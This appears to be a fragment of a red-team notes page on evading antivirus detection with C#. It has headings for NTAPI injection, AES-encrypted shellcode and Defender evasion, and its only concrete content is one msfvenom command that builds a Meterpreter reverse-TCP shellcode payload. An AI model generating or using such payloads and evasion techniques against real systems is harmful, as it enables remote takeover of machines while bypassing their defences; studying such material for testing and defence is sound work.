Evasion and bypassing detection within C#
Overview
Experiment
Using NTAPI Undocumented FunctionsMsfvenom payload
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=eth0 LPORT=443 -f raw EXITFUNC=thread -o shellcode.binInjector without any shellcode

Raw Meterpreter payload shellcode

Using AES encryption
Aes encryptor
Runner it twice and defender is not so nice
Time accelerated checks
References
C# .Net AssemblyLast updated